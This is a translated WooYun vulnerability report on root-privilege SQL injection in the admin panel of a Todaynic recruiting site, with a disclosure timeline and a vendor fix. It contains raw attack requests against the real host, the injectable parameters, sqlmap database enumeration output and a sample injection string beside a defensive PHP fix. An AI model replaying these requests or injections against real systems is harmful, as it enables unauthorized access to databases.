
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0134820

Title: Domain registrar security: two root-privilege MySQL injections on a Todaynic (时代互联) site (came within a step of the admin backend)

Vendor: Guangdong Todaynic Technology Co., Ltd. (广东时代互联科技有限公司)

Author: 路人甲

Submitted: 2015-08-17 22:47

Fixed: 2015-09-16 09:30

Published: 2015-09-16 09:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Fixed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-08-17: Details sent to the vendor, awaiting vendor handling
2015-08-18: Vendor confirmed; details disclosed to the vendor only
2015-08-28: Details disclosed to core white hats and relevant domain experts
2015-09-07: Details disclosed to ordinary white hats
2015-09-16: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public

Brief description:

Injection. If the vendor ignores this, I'll be heartbroken!!!

Detailed description:

POST /admin.php/hr/hrlist_edit_submit HTTP/1.1
Content-Length: 123
Content-Type: application/x-www-form-urlencoded
Referer: http://zhaopin.now.cn/
Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900
Host: zhaopin.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
id[]=&interviewdate=01/01/1967&interviewnoon=%e4%b8%8a%e5%8d%88&interviewtime=1&submit=%e6%8f%90%e4%ba%a4%e5%8f%91%e9%80%81


Injection parameter: id[]


POST /admin.php/article/opt HTTP/1.1
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: http://zhaopin.now.cn/
Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900
Host: zhaopin.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=del_allheckbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c


Injection parameter: checkbox[]
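Both injection points above are array parameters (`id[]`, `checkbox[]`) posted to bulk edit/delete actions, which is the classic shape of an `IN (...)` clause built by string concatenation. The following is an added illustration written for this page, not the vendor's code (the real handler behind `admin.php` was never published). The table name `hr_list`, the column `id` and the SQLite in-memory database standing in for MySQL are all assumptions; the unsafe builder only returns the query string and is never executed.

```php
<?php
// Added illustration (not the vendor's code). Shows how an array parameter such
// as id[] or checkbox[] becomes an injection point when imploded into IN(), and
// the validated, parameterized form that closes it. Table/column names assumed.

// Hypothetical vulnerable pattern: the request array is imploded straight into
// the SQL text. One element that is not a bare integer rewrites the statement.
function buildDeleteUnsafe(array $ids): string {
    return "DELETE FROM hr_list WHERE id IN (" . implode(',', $ids) . ")";
}

// Hardened form: reject anything that is not a plain integer, then bind one
// placeholder per value so the database never sees user data as SQL text.
function deleteByIds(PDO $pdo, array $ids): int {
    $clean = [];
    foreach ($ids as $id) {
        if (!is_string($id) && !is_int($id)) {
            throw new InvalidArgumentException('id must be a scalar');
        }
        if (!preg_match('/^\d{1,10}$/', (string) $id)) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $clean[] = (int) $id;
    }
    if ($clean === []) {
        return 0; // nothing to delete; also avoids an invalid "IN ()" clause
    }
    $placeholders = implode(',', array_fill(0, count($clean), '?'));
    $stmt = $pdo->prepare("DELETE FROM hr_list WHERE id IN ($placeholders)");
    foreach ($clean as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT); // positional, 1-based
    }
    $stmt->execute();
    return $stmt->rowCount();
}

// Demonstration against an in-memory SQLite database (assumed stand-in for MySQL).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE hr_list (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO hr_list VALUES (1,'a'),(2,'b'),(3,'c')");

// Constructed sample input: a single array element that is not an integer.
$hostile = ['1) OR (1=1'];
echo "unsafe query text: ", buildDeleteUnsafe($hostile), PHP_EOL;
try {
    deleteByIds($pdo, $hostile);
} catch (InvalidArgumentException $e) {
    echo "hardened path rejected input: ", $e->getMessage(), PHP_EOL;
}
echo "rows deleted for ['2','3']: ", deleteByIds($pdo, ['2', '3']), PHP_EOL;
```

Two points for the fix. First, the `ci_session` cookie suggests CodeIgniter; its query builder (`$this->db->where_in('id', $ids)`) escapes each element, so the framework already offers the safe path and the handler only needs to stop assembling SQL by hand. Second, the report notes the application connects as MySQL root and sqlmap enumerated nine databases, including `proftpd` and `webphone`, that have nothing to do with a recruiting site; a dedicated account with grants limited to `db_now_net_cn` would have kept an injection in `zhaopin.now.cn` from reaching the rest of the server.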


[screenshot: 1.jpg]


[screenshot: 2.jpg]


[screenshot: 3.jpg]


available databases [9]:
[*] #mysql50#lost+found
[*] db_now_net_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] proftpd
[*] test
[*] webphone
[*] webphone_center



Look at the current database!

Masked region
*****ve value(s) fou*****
*****uery used retu*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_3431_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_343*****
*****eved: np_343*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_3431_p*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_456_ar*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_456*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_456_pr*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_888_ar*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_888*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_888_pr*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_aat*****
*****rieved: np_*****
*****ed: np_aatkq_*****
*****rieved: np_*****
*****eved: np_aat*****
*****eved: np_aat*****
*****eved: np_aat*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_aatkq_*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_air_ar*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_air*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_air_pr*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_arm*****
*****eved: np_arm*****
*****: np_armies2_a*****
*****rieved: np_*****
*****eved: np_arm*****
*****eved: np_arm*****
*****eved: np_arm*****
*****rieved: np_*****
*****eved: np_arm*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_arm*****
*****: np_armies2_p*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_arm*****
*****rieved: np_*****
*****ed: np_armies*****
*****rieved: np_*****
*****eved: np_arm*****
*****eved: np_arm*****
*****eved: np_arm*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_armies*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_asia_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_asi*****
*****eved: np_asi*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_asia_p*****
*****etrieved: *****
*****eved: np_blu*****
*****ed: np_bluesp*****
*****eved: np_blu*****
*****: np_bluesprin*****
*****eved: np_blu*****
*****ed: np_bluesp*****
*****ed: np_bluesp*****
*****ed: np_bluesp*****
*****eved: np_blu*****
*****eved: np_blu*****
*****eved: np_blu*****
*****rieved: np_*****
*****eved: np_blu*****
*****eved: np_blu*****
*****: np_bluesprin*****
*****eved: np_blu*****
*****eved: np_can*****
*****eved: np_can*****
*****eved: np_can*****
*****: np_canyin007*****
*****eved: np_can*****
*****eved: np_can*****
*****ed: np_canyin*****
*****ed: np_canyin*****
*****eved: np_can*****
*****eved: np_can*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_can*****
*****: np_canyin007*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_car*****
*****rieved: np_*****
*****ed: np_car4s_*****
*****rieved: np_*****
*****eved: np_car*****
*****eved: np_car*****
*****eved: np_car*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_car4s_*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_cgm*****
*****eved: np_cgm*****
*****: np_cgmacau_a*****
*****rieved: np_*****
*****eved: np_cgm*****
*****eved: np_cgm*****
*****eved: np_cgm*****
*****rieved: np_*****
*****eved: np_cgm*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cgm*****
*****: np_cgmacau_p*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_chi*****
*****rieved: np_*****
*****ed: np_chile_*****
*****rieved: np_*****
*****eved: np_chi*****
*****eved: np_chi*****
*****eved: np_chi*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_chile_*****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_cogi_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cog*****
*****eved: np_cog*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_cogi_p*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_cor*****
*****eved: np_cor*****
*****: np_corecool_*****
*****eved: np_cor*****
*****eved: np_cor*****
*****ed: np_coreco*****
*****eved: np_cor*****
*****eved: np_cor*****
*****eved: np_cor*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cor*****
*****: np_corecool_*****
*****rieved: np_*****
*****etrieved: *****
*****rieved: np_*****
*****rieved: np_*****
*****ed: np_cuhk_a*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cuh*****
*****eved: np_cuh*****
*****rieved: np_*****
*****rieved: np_*****
*****etrieved: *****
*****etrieved: *****
*****etrieved: *****
*****rieved: np_*****
*****ed: np_cuhk_p*****
*****etrieved: *****
*****rieved: np_*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****: np_cwjyp014_*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****ed: np_cwjyp0*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****eved: np_cwj*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_cwj*****
*****: np_cwjyp014_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_dac*****
*****eved: np_dac*****
*****: np_dacarat_a*****
*****rieved: np_*****
*****eved: np_dac*****
*****eved: np_dac*****
*****eved: np_dac*****
*****rieved: np_*****
*****eved: np_dac*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_dac*****
*****: np_dacarat_p*****
*****rieved: np_*****
*****rieved: np_*****
*****eved: np_dds*****
*****eved: np_dds*****
*****: np_ddsdfsfs_*****
*****eved: np_dds*****
*****eved: np_dds*****
*****rieved: np_*****
*****rieved: np_*****
*****rieved: np_*****


[screenshot: 5.jpg]


>>>> So many tables that sqlmap's output could not hold them all <<<<<


Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-08-18 12:57

Vendor reply:

We will fix it as soon as possible. Thanks to the white-hat bro for reporting the vulnerability, ^_^

Latest status:

2015-09-16: Fixed